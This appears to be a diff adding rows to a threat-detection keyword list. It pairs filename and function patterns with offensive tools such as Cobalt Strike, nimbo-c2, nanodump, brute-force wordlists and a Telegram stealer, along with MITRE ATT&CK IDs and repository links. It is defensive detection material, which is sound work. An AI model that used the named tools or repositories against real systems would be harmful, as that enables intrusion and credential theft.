+"*WMIPersist.*","offensive_tool_keyword","WMIPersistence","An example of how to perform WMI Event Subscription persistence using C#","T1547.008 - T1084 - T1053 - T1059.003","TA0003 - TA0004 - TA0002","N/A","N/A","Persistence","https://github.com/mdsecactivebreach/WMIPersistence","1","1","N/A","N/A","2","112","34","2019-05-29T09:48:46Z","2019-05-29T09:40:01Z"
+"*wmipersist.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*wmipersistence.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z"
+"*WMIPersistence.vbs*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z"
+"*WMIPersistImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*WMI-ProcessCreate.cpp*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z"
+"*WMIReg.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*wmispawn select*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*WmiSploit.git*","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z"
+"*WmiSploit-master/zip*","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z"
+"*WNFarmDynamite_h.cs*","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z"
+"*word_gen_b_varlen.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*word_unc_injector.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*Wordlist/ftp_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z"
+"*Wordlist/ftp_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z"
+"*Wordlist/ftp_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z"
+"*Wordlist/mssql_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z"
+"*Wordlist/mysql_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z"
+"*Wordlist/oracle_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential 
Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z"
+"*Wordlist/pass.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z"
+"*Wordlist/pop_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z"
+"*Wordlist/pop_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z"
+"*Wordlist/postgres_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z"
+"*Wordlist/smtp_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z"
+"*Wordlist/smtp_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z"
+"*Wordlist/snmp.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z"
+"*Wordlist/sql_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z"
+"*Wordlist/sql_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z"
+"*Wordlist/ssh_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z"
+"*Wordlist/ssh_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z"
+"*Wordlist/ssh_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z"
+"*Wordlist/telnet_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z"
+"*Wordlist/telnet_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z"
+"*Wordlist/telnet_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential 
Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z"
+"*Wordlist/user.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z"
+"*Wordlist/vnc_p.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z"
+"*Wordlist/windows_u.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z"
+"*Wordlist/windows_up.txt*","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","1","N/A","N/A","4","363","78","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z"
+"*wordlist_TLAs.txt*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*--wordlist=*-passwords.txt*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z"
+"*wordlist-nthash-reversed*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. 
It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z"
+"*wordlist-probable.txt*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*wordlists*rmg.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
+"*wordlists*rmiscout.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
+"*wordlists/dynamic-all.txt*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z"
+"*wordlists/fasttrack.txt*","offensive_tool_keyword","cerbrutus","Network brute force tool. written in Python. 
Faster than other existing solutions (including the main leader in the network brute force market).","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Cerbrutus-BruteForcer/cerbrutus","1","1","N/A","N/A","3","291","42","2021-08-22T19:05:45Z","2021-07-07T19:11:40Z"
+"*wordlists/rockyou.txt'*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z"
+"*wordlists/subdomains-5000.txt*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","4","376","52","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z"
+"*wordlists/top1million.txt*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","4","376","52","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z"
+"*WorldWind Stealer.zip*","offensive_tool_keyword","WorldWind-Stealer","WorldWind Stealer This stealer sends logs directly to your telegram id from a Bot that YOU Create with telegram","T1114.002 - T1071.001 - T1552.002","TA0011 - TA0005 - TA0040","N/A","N/A","malware","https://github.com/Leecher21/WorldWind-Stealer","1","1","N/A","10","1","11","3","2023-03-25T09:54:01Z","2023-02-07T11:44:42Z"
+"*WorldWind-Stealer*","offensive_tool_keyword","WorldWind-Stealer","WorldWind Stealer This stealer sends logs directly to your telegram id from a Bot that YOU Create with telegram","T1114.002 - T1071.001 - T1552.002","TA0011 - TA0005 - TA0040","N/A","N/A","malware","https://github.com/Leecher21/WorldWind-Stealer","1","1","N/A","10","1","11","3","2023-03-25T09:54:01Z","2023-02-07T11:44:42Z"
+"*wpapcap2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*wp-exploitable-plugins.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*wpscan --api-token *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*WPScan*","offensive_tool_keyword","WPScan","WPScan is a black box WordPress vulnerability scanner.","T1190 - T1210.001 - T1195","TA0007 - TA0010 - ","N/A","N/A","Web 
Attacks","https://github.com/wpscanteam/wpscan","1","1","N/A","N/A","10","7831","1230","2023-10-02T10:48:40Z","2012-07-11T20:27:47Z"
+"*wrap_execute_assembly*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z"
+"*wrap_execute_encoded_powershell*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z"
+"*wrap_get_clipboard*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z"
+"*wrap_inject_shellc*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z"
+"*wrap_load_memfd*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 
is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z"
+"*wrap_unhook_ntdll*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z"
+"*write_cs_teamserver*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z"
+"*write_payload_dll_transacted*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z"
+"*write_what_where.py*","offensive_tool_keyword","POC","POC to check for CVE-2020-0796 / SMBGhost","T1210.001 - T1213 - T1212 - T1201","TA0007 - TA0002","N/A","N/A","Exploitation tools","https://github.com/ZecOps/CVE-2020-0796-LPE-POC","1","1","N/A","N/A","3","242","90","2020-04-02T08:01:38Z","2020-03-30T16:06:50Z"
+"*WriteAndExecuteShellcode*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z"
+"*WriteDLLPermission.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Write-HijackDll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
